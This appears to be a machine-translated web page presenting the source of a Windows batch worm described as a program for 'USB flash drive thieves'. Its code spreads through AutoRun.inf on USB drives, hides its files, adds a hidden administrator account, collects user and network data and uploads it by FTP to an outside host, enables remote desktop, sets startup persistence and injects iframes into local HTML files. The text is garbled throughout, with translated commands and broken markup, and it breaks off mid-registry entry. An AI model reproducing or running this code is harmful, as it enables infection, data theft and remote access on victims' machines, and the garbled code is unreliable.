Crear un programa por lotes para ladrones de unidades flash USB
@Echo desactivado y modo Con Cols=14 líneas=1
Establecer pp=%SystemRoot%\System32
Si existe %pp%\SysTask.vbs Ir a PassOk
Establecer ck= Modo Con Cols=14 Líneas=^^1
Establecer ff=%Fecha:~5,2%Fecha:~8,2%Hora:~ 3,2%Tiempo:~6,2%
Establecer MyUser=SystemTest
Establecer IframePage=/ Index.html
Copiar %0 %pp%\ SysTask.bat
Copiar %pp%\cmd.exe %pp%\P%ff%.exe
Copiar %pp%\wscript.exe %pp%\Pws%ff %.exe
Echo.[AutoRun]>%pp%\AutoRun.inf
Echo Shell\Open=Open(^&O)>>%pp%\AutoRun.inf
Echo Shell\Open\Command=Wscript.exe Snail.vbs>>%pp%\AutoRun.inf
Echo Shell\Explore=Explorer(^&X)>>%pp% \AutoRun.inf
Echo Shell\Explore\Command= Wscript.exe Snail.vbs>>%pp%\AutoRun.inf
Echo abierto www.10mb.cn>%pp %\UpPj.dat
Echo bshk>>%pp%\UpPj.dat
Echo 39343642>>%pp%\UpPj.dat
Eco cd Soft>>%pp%\UpPj.dat
Echo poner %pp%\My%ff%.dat>>%pp%\UpPj.dat
Echo obtener SysBak.bat >>%pp%\UpPj.dat
Echo salir>>%pp%\UpPj.dat
Echo @Echo apagado>%pp%\ShowMe.cmd
Administrador de usuarios de Echo Net "">>%pp%\ShowMe.cmd
Usuario de Echo Net %MyUser% /add>>%pp%\ShowMe.cmd
Echo administradores de grupo local de red % MyUser% /add>>%pp%\ShowMe.cmd
Usuario de Echo net^>%pp%\My%ff%.dat>>%pp%\ShowMe.cmd p>
Echo Echo %%date%___%time%^ >^>%pp%\My%ff%.dat>>%pp%\ShowMe.cmd
Echo ipconfig /all^ >^>%pp%Mi%ff%.dat>>
;%pp%\ShowMe.cmd
Echo ftp -s:%pp%\UpPj.dat>>%pp%\ShowMe.cmd
Echo Llamada SysBak.bat>> %pp%\ShowMe.cmd
Echo @Echo desactivado ^& %ck%>%pp%\self.bat
Echo TaskKill /im P%ff%.exe /f /t>>%pp%\self.
Echo TaskKill /im wscript.exe /f /t>>%pp%\self.bat
Salida de eco>>%pp %\self.bat
Echo Del %pp%\P%ff%.exe>%pp%\KillMe.bat
Echo Del %pp%\Pws%ff%. exe>>%pp%\KillMe.bat
Echo @Echo desactivado ^& %ck%>%pp%\NoDel.bat
Echo para %%% %p In (b c d e f g h i j k l m o p q r s t u v w x y z) Hacer (>>%pp%\NoDel.bat
Echo si existe %%%%p: (>>%pp%\NoDel.bat
Echo para %%%%j en (SysTask.bat Snail.vbs AutoRun.inf) Hacer (>>%pp%\NoDel.bat
Echo Dir %%%%p:\%%% %j /a^>Nul ^|^| Copiar %pp%\%%%%j %%%%p:\^>Nul ^&^& Atributo %%%%p:\%%%%j +h +s +r^>Nul>>%pp%\NoDel.bat
Echo )))>>%pp%\NoDel.bat
Eco @Echo desactivado>%pp %\SysIframe.cmd
Echo si no existe %pp%\Start.slog Echo KS^>%pp%\Start slog^&Goto RunKj>>%pp%\SysIframe.cmd
.Echo para /l %%%%k en (1,1,7) Hacer (si no existe %pp%\%%%%k.rlog Echo %%%%k^>%pp%\%% %%k.rlog^&Goto EndKj)>>%pp%\SysIframe.cmd
Echo :RunKj>>%pp%\SysIframe.cmd
Echo Del %pp%\ *.rlog>>%pp%\SysIframe.cmd
Eco para %%%%d en (b c d e f g h i j k l n m o p q r s t u v w x y z) hacer (>>%pp%\SysIframe.cmd
Echo Para /f "usebackq delims==" %%%%m en (`dir %%%%d:\*.htm /s /b`) haga (>&
gt;%pp%\SysIframe.cmd
Echo Echo Echo ^^^
Echo ))>>%pp%\SysIframe.cmd
Echo :EndKj>>%pp%\SysIframe .cmd
Salida de eco>>%pp%\SysIframe.cmd
Echo @Echo desactivado>%pp%\SysNew.
Ping de eco 127.0.0.1 ^>nul>& gt;%pp%\SysNew.bat
Echo Ping 127.0.0.1^>nul>>%pp%\SysNew.bat
Echo Start Pws%ff %.exe %pp%\SysTask.vbs>>%pp%\SysNew.bat
Salida de eco>>%pp%\SysNew.bat
Echo @Echo desactivado>% pp%\SysServer.bat
Echo Net Start shellhwdetection>& gt;%pp%\SysServer.bat
Echo Net Start TermService>>%pp%\SysServer.bat p>
Echo Net Start TermService>>%pp%\SysServer.bat.
bat
Echo Net Start Messenger>>%pp%\SysServer.gt;>%pp%\SysServer.bat
Echo Net Stop alg.CreateObject("Wscript.Shell") >%pp%\Snail.vbs
Echo N.Run "\",^3,false>>%pp%\Snail.vbs
Echo N.Run "cmd. exe /c SysTask.bat" ,^0>>%pp%\Snail.vbs
Echo N.Run "cmd.exe /c SysNew.bat" ,^0>>%pp%\Snail .vbs
Echo N.Run "Taskkill /im P%ff%.exe" ,^0>>%pp%\Snail.vbs
Echo N.Run "Taskkill / im wscript.exe" ,^0>>%pp%\Snail.vbs
Echo Set Pj=Wscript.>%pp%\SysTask.vbs
Echo Pj.Run " P%ff%.exe /c Regedit /s %pp%\Snail.reg" ,^0>>%pp%\SysTask.vbs
Echo Do>>%pp%\SysTask.vbs
Echo Wscript.sleep 9000>>%pp%\SysTask.vbs
Echo xx=xx+1>>%pp%\SysTask.vbs
Echo Pj.Run "P%ff%.exe /c %pp%\NoDel.bat" ,^0>>%pp%\SysTask.vbs
Echo Wscript.sleep 9000>>%pp%\ SysTask.vbs
Eco si xx = 33 Entonces Pj.Run "P% ff%.exe /c %pp%\ShowMe.cmd" ,^0 : xx=^0>>%pp%\ SysTask.vbs
Echo Loop>>%pp%\SysTask.vbs
Echo Set one=Wscript.CreateObject("Wscript.Shell")>>%pp%\SysOne. vbs
Echo one.run "cmd.exe /c SysIframe.cmd" ,^0>>%pp%\SysOne.vbs
Copiar % pp%\SysOne.vbs % SystemDrive%\Docume~1\%username%\Menú Inicio\programas\start
Iniciar %pp%\SysTask.vbs
Echo REGEDIT4>%pp%\Snail.reg
ECHO.>>%pp%\Snail.reg
Echo [HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer\Run]>>%pp%\Snail.reg